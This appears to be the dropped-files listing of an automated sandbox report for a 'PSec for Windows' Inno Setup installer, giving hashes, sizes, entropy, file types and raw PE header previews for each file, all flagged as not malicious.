                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L....#.............!......................... ...............................@......Z.....@E............................T............ .. ....................0..........T............................................................................data...W........................... ..`.rsrc... .... ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7680
                              Entropy (8bit):3.341098387319522
                              Encrypted:false
                              SSDEEP:48:qoQFOfuKNkpBBhXbVc1u79I+nNNKDzVUNcO1Hy0uFdbocZWPWAuVc5WwHgHq:vQh+kvbbVx9IS4DyNcO1HydFzWsAWwy
                              MD5:110BB11112903EE1BECE36BABA256754
                              SHA1:C0ABCC794F35D6AEB0A2349BAC890BC8BFC47F0A
                              SHA-256:81A6E79F3AC731BB3C7EFBDCAF18DF7662964B8E7907018B1B4551F3562F1B66
                              SHA-512:4EC8E3BF67A73141AB62DA26CE45E5DA170D994A5ECF7A99252F5B58C016B320BDA97BF9FF9AD028B45E9560FDFDE1064046695E3CE930D2EC71473027DC3379
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...'a%............!.........................0.....R.........................P.......A....@..........................................0..0....................@......@ ..T............................................................................data............................... ..`.rsrc...0....0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):80896
                              Entropy (8bit):6.243895837934394
                              Encrypted:false
                              SSDEEP:1536:U5i0hBmMsWjcdIkpk0551bBuej8LrdHNaAssqeyAiBTd9aFZBrx7WwE45:UhBGIkV71bBuEmrIsqeyAiBTdCBrpWwr
                              MD5:CAE8E531CD82401A9ECB4C446CBB964B
                              SHA1:60F23D6F5BAEA091C997DC7527C0F2896C801F6F
                              SHA-256:F5FBD701E0CEEFCAB76839231C23F29EB967AD6107520B8454C40FD8DCDDFDE1
                              SHA-512:0D87C7C6797312286AB141AF5260BA8E6A3DE98A51617AFF9F7D1DC149B239FA04E26F87B72FB7E4BC387566317C8801A62D50E953F0872A8790EB5B9D8F7932
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7..s...s...s...g...Q...g...h...g...t...s.......g...q...g.......g.|.r...g...r...Richs...........PE..L...!.......................6......0e....... ....@..........................p...........@...... ...........................A..P....P.......................`......PU..T............................!...............@...............................text............................... ..`.data........ ......................@....idata..L....@......................@..@.rsrc........P.......&..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):70224
                              Entropy (8bit):5.147993943292643
                              Encrypted:false
                              SSDEEP:1536:MV9zfyEBAuhPLNXf/nWHNfdzd+zLZKzyF:Q9zlBhZxXf/nWHNdAok
                              MD5:DADB101E49A2CD1F0451AA7762D4B83C
                              SHA1:E2DDB718652E3276244F16BE562E07925ED2623A
                              SHA-256:5EE1FE1A80A2294DB5719502D1E089B0B18AB202B617157D114039789A9A396E
                              SHA-512:C16B9B52B0CB1A0CB127D040681A0381236121BA33EB2DA3AD728109EA79C0B335CAF8FB7912AF050409D0FB5690C959C9113EF26E98FBEA4E9C5BD1173AC8AA
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}Y=.98S.98S.98S.?...88S.?.Q.88S.Rich98S.................PE..L................."!...&.............................................................^....@.......................................... ..................PP..............T............................................................................text...P...........................@..@.rsrc........ ......................@..@................T...l...l...................l...........................$...,...,...........................RSDS\..V....4O(...n.....D:\a\_work\1\s\binaries\x86ret\bin\i386\\MFC140ENU.i386.pdb.........T....rdata..T........rdata$voltmd...l........rdata$zzzdbg.... ..p....rsrc$01....p1..0....rsrc$02.... ...\..V....4O(...n.....d.,t.t..............................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):3.82952728424198
                              Encrypted:false
                              SSDEEP:384:pWpSW07HJYHZSxRswpfPFx2AmfN3IsK717:EQWsxRs6EIN
                              MD5:6F47F9FF734CCE033CF391591D688046
                              SHA1:04CCC2769E17BAE55709BFCAB9AE05EAA88C3947
                              SHA-256:BD21573B6554300E6DDC77269FBE7BEB1D32A6AACAA3CC872703AA0F73E68D66
                              SHA-512:652DF8A984535103C3DBD9044E84EF2FAB3335810E3C55CCB64A4DA42F1ABC0ADCED75F8585EA2452D9DA9EE907E3CDCC8F3C9A2AF720E237BF640B77C523B03
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L................!.........N....................hD.........................p.......I....@.......................................... ...K..............................8............................................................................text...............................@..@.rsrc....K... ...L..................@..@..............T...8...8.................$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!...J...rsrc$02.... ............<l.;.aJD..-.V.V............................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):709120
                              Entropy (8bit):5.992581602394087
                              Encrypted:false
                              SSDEEP:12288:8myV/tTB9ef3BvRy9NNPI0+DCksfBzu9KRAAJ3jqG3nSgrfhbeqLf:vyFt3efBvRy9NNPItCkGuqLRjx3nSgLN
                              MD5:B0027D5280E1D7EFFC0B9A1E94A6F94C
                              SHA1:6762909AEA5F77A0F7818DFA1BB0E2208732BAFD
                              SHA-256:E06519F29B149D64D534A19FA1F6A31066F4B68FB700CEDB4FB0A9921D79EBBD
                              SHA-512:04EC97501B91D342DCEF34C9AD3ABEEB477B72ADEFA574F10650E886EC011120BE7C5574EF02489FD3CE0F51FE6F2DE0D9AE6FD83A3FBB077DC0985A920755AA
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...!...J...2...J...J...L...!...J...!...J...!...J...!...J...!...J...!}..J...!...J...!...J..Rich.J..................PE..L.....c............!................pw.............P.........................0............@A........................P...:....G..`................................a......T............................................@..........@....................text............................... ..`.data....*..........................@....idata...C...@...D..................@..@.didat..d............X..............@....rsrc................\..............@..@.reloc...a.......b...p..............@..B................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):100352
                              Entropy (8bit):6.268429975218522
                              Encrypted:false
                              SSDEEP:1536:thDj/y2ObZIxMoYye97D4nWkbT5+yYWZO6T5rEBzEzw/QGowH/OmGr:vDjrOYjeFD4nWm5+yjT6dNYUOZ
                              MD5:86AB2A500D974CBBC20EE7FA1F408CEC
                              SHA1:E540DC889F98CC042A53FE67F0D935C675A55D4F
                              SHA-256:6F055C097B986ACDEC861247120C8281C7C67FF5BED40F58E2E921F70E5C6E7A
                              SHA-512:4E7F6D2BEE39D52F4961DD503EE7F7429020EE4AEAF89B0FC18BD7F6615568DAA656A12B1CDED4893452A40C392D196CF3894E0DA8CC0BAD90F9B5DDB767B593
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2..ea..ea..ea...a..ea..f`..ea..a`..ea..da%.ea..d`..ea..e`..ea..l`..ea..``..ea...a..ea..g`..eaRich..ea........PE..L.....dp...........!.....(..........0$.......@......................................&.....@A.........................3..x...hr.......................................7..T...........................(................p..d....0.......................text...(&.......(.................. ..`.data....'...@.......,..............@....idata.......p......................@..@.didat..P............D..............@....rsrc............0...F..............@..@.reloc...............v..............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):4056240
                              Entropy (8bit):7.97002360834342
                              Encrypted:false
                              SSDEEP:98304:QsSoMQnPLeMNCvYa59QKS7XnqSsAVlsX4pIDmjjcrhm2NGbUU:QsSByeMj04VlslQsm2NK
                              MD5:01EF58E7C144C701B2EA01CFC049DBE4
                              SHA1:2F572ACCB519096C9EA805812BA53703C16CCEEA
                              SHA-256:AE5B66322E5A7C26AD21CCC556BDC1618796166565D2939142C5AA3D76C38ACE
                              SHA-512:434FD6D4EB49669617DA3A15C2239A2CF524624CC4FCF9F09D8BB78A40DDF2DC5E70105E6708CE7643448F3176301EDD64A9B71244C179A836119532D7DD69A6
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................... .......L>...@..........................................P..X...........(.=..)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...X....P......................@..@................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):183296
                              Entropy (8bit):6.493584105087857
                              Encrypted:false
                              SSDEEP:3072:0uv++PiLzpzMdxVP38TyqaOVhWedhOC3Vn4fry43/N:0YfPkpzM9PSzWeWCln8j
                              MD5:064C2ABC579277DD94259D5F985C4FD4
                              SHA1:75BD2A45E9FB320A303FCD81E894D96EDAF7CBCB
                              SHA-256:449F0431E5C6FAE736A2E367818813F279B41BA32A3979EE6D1359EC4DFC3BFE
                              SHA-512:7D62A88437662EF9A3D5D552E43D5B8A1641FFF8ACF70B327CA7D18EA806298E38E8B4B4BBA0C1697D9B74A14C23D74E49914CDC656061E01F95C3FB737C27FD
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H.&...&...&.......&...%...&..."...&...'..&...'...&...#...&...&...&.../...&......&...$...&.Rich..&.........PE..L....{.............!.........H......0A...................................................@A................................t...................................l)...?..T...................t...........................p............................text............................... ..`.data...D...........................@....idata..>...........................@..@.rsrc...............................@..@.reloc..l).......*..................@..B........................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):47104
                              Entropy (8bit):6.2437778672689985
                              Encrypted:false
                              SSDEEP:768:A686/iNXC+tFbpTSRkg3AAdYn7AJUeuFRseJgvDwzcQx8Z499:Av6/iNXXDuX7meUeuFKrvcJaZ49
                              MD5:7801A2F01B7F0163DA0088B1E666A573
                              SHA1:C4D91352CFA440C2EC7018A412B8C3DABC0DC905
                              SHA-256:62B4D125AE01FD97C91AFC55238E15D643CC4DB92F990D9D5C40C0C62FA270F3
                              SHA-512:992CA7A0E75E7AC64AA43040C98A32C50566376F754B8EEA08993F235D816DDF6C9A97FB221C01230C26AF6ACC3113DC7C0541FBE011BCA1A947F32BCA93ABEE
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.2.g.\.g.\.g.\.n...K.\.s.X.q.\.s.Y.b.\.s._.d.\.s.].r.\.g.]..\.s.T.s.\.s..f.\.s.^.f.\.Richg.\.........................PE..L...M........................:...... .............@.................................K.....@...... ......................................x............................#..T...............................................|............................text............................... ..`.data...$...........................@....idata..8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):46080
                              Entropy (8bit):5.996220242040934
                              Encrypted:false
                              SSDEEP:768:NXfEQgbKXSjjj/fAU7kpcyiPhZkbzKKkv6H+WnfFV6gWpMUt56Xf5rvZ/qWyIV6H:WVz/vOOsRzUyRR/q2upZm48
                              MD5:539063395EFBB5480C0AC13CC9E5FB16
                              SHA1:772038B6EDE76831AC02444CCD826089283FE0C0
                              SHA-256:18F9DF881FFEB43EBF558CB5BFC2B40BB64E54A2DEE391B79CEBB10173FB41EB
                              SHA-512:7D4CBE926EA364DAFCB7283AC78658ADC0DEE14BF41F1CD584975EA206C90511B155266B554D96175C24B3758DDFB40226BDB53C6EC9BACAC84C654C0A854550
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.).s..e...p..e...h..e...v..e...h..q..q..e...z..e.E.p..e...p..Richq..........PE..L.....K..................|...8......pu............@.................................v.....@...... ..........................4...........h............................$..T...............................................0............................text....{.......|.................. ..`.data...,...........................@....idata..j...........................@..@.rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):108544
                              Entropy (8bit):6.242701983451339
                              Encrypted:false
                              SSDEEP:1536:YFQ53HD5Wp6WgjJqie+qR5i29VLlsB32YUwAtF0MBJbTmXJ:I43D7ci2LXL6B32YUwO0MLbTmX
                              MD5:7AB4616DE5856615CA9E0D1FCD01FAD0
                              SHA1:36AA0E0F0547AA1B64EC8B2A95EC93518A766163
                              SHA-256:A0CE5F7D716E881A596332D7ECDC0BC8AAA89FDE9D1BF1B78F3152A3920CD987
                              SHA-512:438EB34699F339AB3C11861BB9B86DCBDBA0C604E43240CD433C7DE3814F1C36D61C54900F034CCBE62B30D419C61A78567E33761A99E42CFC50724CD0F9CE1C
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y8...k...k...k..k...k..j...k..j...k...k^..k..j...k..j...k..j...k..j...k..k...k..j...kRich...k........................PE..L...D..............!.....B...f......@=.......`............................................@A.........................P.......q...........2..........................@P..T............................,...............p.......K.......................text...OA.......B.................. ..`.data... ....`.......F..............@....idata.......p.......H..............@..@.didat...............V..............@....rsrc....2.......4...X..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.916839934179735
                              Encrypted:false
                              SSDEEP:768:VP+MF9uXFkzxt8xJ0ltub+aTOV6GndP4Nm5f:VNumn8xJga294Ny
                              MD5:83D97778953F5A1A93EA93E644273DC7
                              SHA1:2E86AF4B2BA1D5F5B94B331218B46C6EC9504AE3
                              SHA-256:26A413AB3FDA517896723362E32BCF91EE421D35AA72F5059CF652BB05173F32
                              SHA-512:57E46B3F78887B37480AA041E09B3E08BA4ABD42600B7EE12FE77F2222452431466759BB4F3577C3FB6BF816530C227CFBAADBDB7ADC8C145468B38A7304591F
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!..O...O...O...N...O......O...N...O...L...O...K...O...O...O...B...O...J...O.......O.......O...M...O.Rich..O.........................PE..L....zZh...........!.....n...$.......(..............................................[_....@A.........................u..F...\...................................D.......T...............................................X...\p.......................text...6l.......n.................. ..`.data................r..............@....idata...............t..............@..@.didat..............................@....rsrc...............................@..@.reloc..D...........................@..B........................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):2560
                              Entropy (8bit):2.903432271168218
                              Encrypted:false
                              SSDEEP:24:eH1GS8WGJb3MxCMD5uIZW0THWokPINug9hv35WWdPPYPNyBx8:yaf2cIZWwHbuwh/5WwHgcx
                              MD5:79A58206AB9628B34FC7C38C81B68F14
                              SHA1:CDB5501DABAADD95486EB4D970C6E0608D6E2587
                              SHA-256:44A05AF87399C3B1F010DD7B07ADD2F6FE5C31780C47FC96055AE48651213ECB
                              SHA-512:35328F18C7E9F9DA652B8C5056653B7B188003007BA2426503FB00FCB49C5DF2E3288F4D028FE1784950590C9F26AC58E5794A98C5755DDA632B0DAEECCFBF73
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L...([.w...........!.........................................................0............@.......................................... ..X...............................8............................................................................text...............................@..@.rsrc...X.... ......................@..@....([.w........T...8...8.......([.w........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....&.jV.^JQ.fXEY..8.J..+./is.([.w........................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:InnoSetup Log PSec for Windows, version 0x418, 19393 bytes, 061544\37\user\376, C:\Users\user\AppData\Roaming\PSecWin\376
                              Category:dropped
                              Size (bytes):19393
                              Entropy (8bit):3.8169817942792337
                              Encrypted:false
                              SSDEEP:192:r1ConPjXID+4Yu1A1aJ4RCBdYCUyObP4DSmr7kLWGHL:rjnOYu1A164CUyObPIr7JGHL
                              MD5:8FA1CE1F4D57DA53822DA11FBD71A8F9
                              SHA1:E3D534D6D1DFB4F0F056120858936C4A1E4450F2
                              SHA-256:E919E0DBEE0C33E8C87749A48AD3EB96F9524E1E501D7987C38BE1285890B92A
                              SHA-512:1A37F716F4DAE5F71417C1699F2430C6779F60F7BB538A6E8B30C25978478F795BC9D72E46AED45C2A730CCDA8A7BB3D16C9F2CAC594203A1B7ED38F12833525
                              Malicious:false
                              Preview:Inno Setup Uninstall Log (b)....................................PSec for Windows................................................................................................................PSec for Windows....................................................................................................................5....K...................................................................................................................ek.........OU.&...............0.6.1.5.4.4......j.o.n.e.s......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.P.S.e.c.W.i.n..................-.... ......-...6...IFPS....'... ....................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM....................F....IDISPATCH.............!OPENAR
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3244605
                              Entropy (8bit):6.3002173620753625
                              Encrypted:false
                              SSDEEP:49152:2dx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoHVHNTQTEjy333zmgx:XHDYsqiPRhINnq95FoHVBy333C0
                              MD5:83B9079153811D0B853865E88245FBE4
                              SHA1:AEF31BEF95CB3B0126F7981837D53932CBBF4C1E
                              SHA-256:5AECCD5D782A518E35FA5227893C982AD69A5DD87F5D683E036DB34E05B471F1
                              SHA-512:58ECDD1CCD28020DBA7596E52DCC37B77896A807F2B69183A3B0E71B03E7C44187CEE5034F9B5E9474308D7C35D5EF47A0E2ED5FAE3FA446D51CC48D9C089D5C
                              Malicious:false
                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................B,.........`V,......`,...@...........................2...........@......@....................-.......-..9............................................................-.......................-.......-......................text.....,.......,................. ..`.itext...(...0,..*....,............. ..`.data........`,......F,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-...... -.............@..@.rsrc................"-.............@..@..............1.......0.............@..@........................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):360144
                              Entropy (8bit):5.661023715516949
                              Encrypted:false
                              SSDEEP:3072:jCuEydZX7mwKR4L5QprdZvh+h9H7WwfNfZ/CTla1nSrm9W0fQx78qYFQxV3Zsd8+:9EYZXqwKR4lQpr/GDCk3fQxUt9+C
                              MD5:B08196E5863137C12CA5BF166F16AAC7
                              SHA1:A5EEDE1F86B4DBF8EB920FA4B74C03FFAA19847C
                              SHA-256:2379C89382789238DCAE1433C04EEB861A2AB72955EC67D7554F4889AF2788C3
                              SHA-512:ACAB6898ADB05CFD15A60B5248AD4E4C4763EB30BF32A872FE05E2FE29D663E37B7DFC812A5AA66D300AFF3178F045F10A3EA4231DD6B41BFC8BBDFDC6E7C3F4
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ F..A(..A(..A(..*+..A(..*)..A(..A).BA(..*,..A(..*(..A(..* ..A(..*...A(..**..A(.Rich.A(.................PE..L....C1............!.........t...............................................P............@A...........................B...h...(.......`............P....... ..L+...^..T...........................(...................`............................text............................... ..`.data.... .......\..................@....idata..8...........................@..@.rsrc...`...........................@..@.reloc..L+... ...,...$..............@..B................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):67072
                              Entropy (8bit):6.314142155382167
                              Encrypted:false
                              SSDEEP:1536:St/KlpLMTc3WRyIdA2rS7D4NrOI4wlzgB5VdtXgDF3:NLMo3WRyIiwI4kggB5VdtXgDF
                              MD5:0195F2ACF32E1ECDC5AF0E3CF5184373
                              SHA1:993CD3216F983B6D1711CCE77976C71E1B7D6F9E
                              SHA-256:51B3F3BA1A7ABD58BED2C9E9EF67C39592FE585699EFBFE157308AF86F6930CC
                              SHA-512:E922C14E20072993B67DDE391F821E2E58C52D58AE7B194BB999B97C33637FF44597D005ED8E54495D87A4977E3954F00AD07971840115FF9E9343562BB98812
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S..S..S..G...R..G...\..S.....G...@..G...Q..G...R..G...D..G.e.R..G...R..RichS..................PE..L.................!.........0.....................w.........................@............@A........................p...9...H........ ..P....................0..(....!..T........................... ...................D.......`....................text............................... ..`.data...............................@....idata..T...........................@..@.didat..(...........................@....rsrc...P.... ......................@..@.reloc..(....0......................@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):78336
                              Entropy (8bit):6.371751508872591
                              Encrypted:false
                              SSDEEP:1536:UbDMdx4Tm9lSD2HAcOqa57xlYuNxo8b1E:+MduTm9lSD7rNKk6
                              MD5:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                              SHA1:CD2F50FD5A7BD6291DE1948F100415044C767E63
                              SHA-256:3C928B9AFF2E651AA35EA798C29FDE398E9F7817E3451AE0F4C97C86630DC92B
                              SHA-512:84398D4E5680C2EA1679D0076468207A9503B053A233932FD3EFAEFDBF4559CFEAB5A0E95F526644C6382A88C17B6A62D3993323012211AB685DA4C4B025C045
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./.`k..3k..3k..3b.f3E..3...2j..3...2j..3...2...3k..3..3...2h..3...2H..3...3j..3...2j..3Richk..3........PE..L.....RR.....................6....................@..........................p......".....@...... ...........................!.......@..P....................P......P(..T............................................ ...............................text............................... ..`.data...............................@....idata....... ......................@..@.didat.......0......................@....rsrc...P....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):4.139121993350808
                              Encrypted:false
                              SSDEEP:48:yZ/5Q4Ja0Y+0IeaRiCn5yXHUhQqSA6AqzrtEIZWXoXuV25WwHg:ohJr0IeQ5yXuQhrmEWYQmWw
                              MD5:E32319E5947A76F8E50EC50C37906882
                              SHA1:135A1ED2ADD1E8DDFF0920DF82E57078CA3CBD06
                              SHA-256:2A900AC21B85E6E32A502F24B804D8796A0D148B513D449AB4384323846D7DA9
                              SHA-512:5DEFF824DC784CDD44AE7C76B53EB9D212D1D9D2199F23D766325A2702180963BF52C40C6CC095C1F1584B2918DC9A7F4EEA7320904CAD147B48CD0A7F7584C0
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........PE..L.................!..............................8N.........................0......z.....@E........................`...0............ .. ...............................T............................................................................text...<...........................@..@.rsrc... .... ......................@..@...............$..........................d..........................$..................................x.......................H...............>...i...............@...z...........=...v...............5...p...............I...x...............)...Z...............*...]..........."..._...............!...P...............2...g...................................................WS2HELP.dll.WahCloseApcHelper.ws2_32.WahCloseApcHelper.WahCloseHandleHelper.ws2_32.WahCloseHandleHelper.WahClose
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.313827090823637
                              Encrypted:false
                              SSDEEP:768:hpT8dTrLIdc5DGhZgItQwWgGjG1al2YjZ/2:hpAdTrLIdc5DGhZgItTXGcaLjZ/2
                              MD5:2422934B02194D962E3891D91DFF50C8
                              SHA1:7E00DF40C44ABC1077424CAF084494507FFF726F
                              SHA-256:313B1EB5A6DE86E234FCB18A6AA4AE75FFECB9243BDEC7F34253A7FCC9F29FC0
                              SHA-512:6E1F4C7CFA87A4576A5F943AF5B84B9BEADE8FFEA36CB94A03461F338C36C6647D074DBA4B5E160D75018762E5448A193FE59E0D2662DC6FCD24FEDAB45AC256
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........sP.n...n...n.......n.......n.......n...n...n.......n.......n.......n.......n.......n..Rich.n..........PE..L...[..............!.....n...$.......m...............................................M....@A........................P{......D........................................0..T...........................(...................@............................text....l.......n.................. ..`.data...H............r..............@....idata...............t..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):1831424
                              Entropy (8bit):6.562960863651942
                              Encrypted:false
                              SSDEEP:49152:wORUHXxYF3icgea4Zb8nlJq22qT1MTrQyEDAxq4:FR+XxYxhgvc2Dq22gmrNi
                              MD5:61393B3920D949B7A89D8D8623A65BD8
                              SHA1:539EF7897C1A642BAA9353E3B630D35DFC642F5F
                              SHA-256:C70DA787D2857BB08A49327CE75299B6440A75E70BEABC8EFDC4084B779454CE
                              SHA-512:870AD9D39053A6A833A8ECD6F94691CD68839A4C47444D46EDEE0544D58C581D6D1CB821F181F2F9CFAB45C4AECA60CDF8D0D62128E6481319B81724DC4B048D
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'_.]c>..c>..c>..jF..W>..wU..g>..wU..w>..c>...>..wU..j>..wU..W>..wU..b>..wU...>..wU~.b>..wU..b>..Richc>..........................PE..L...g.i...........!.....Z...........`.......p...............................@......._....@A.........................i..................P........................c...Y..T...................l{.......z.......................h..@....................text....Y.......Z.................. ..`.data........p.......^..............@....idata..p............r..............@..@.didat..............................@....rsrc...P...........................@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):98816
                              Entropy (8bit):6.316378030753595
                              Encrypted:false
                              SSDEEP:3072:Q7Gh7ckvMmmAhgZhaHydiPuC0Z7corN/RBPe:Q7Ehg/aHcXCG7corBK
                              MD5:652C03D08A2ABB6ADC51F081B4FA078E
                              SHA1:C75D8762FBF44E97AF4B6C8B68E18977B35264E9
                              SHA-256:33ECC20387B077231AA28A3F13A33FAF030721360E74FD551D71BD26FC30E424
                              SHA-512:3EABA26C7D9B1A58CCD1AF0361E273DC2827D1CF2147A7889642CB3D93071885F7A83DFCD1555CF5C5694E8B61CC7BD9D52270024820050CCD1E5223758301C6
                              Malicious:false
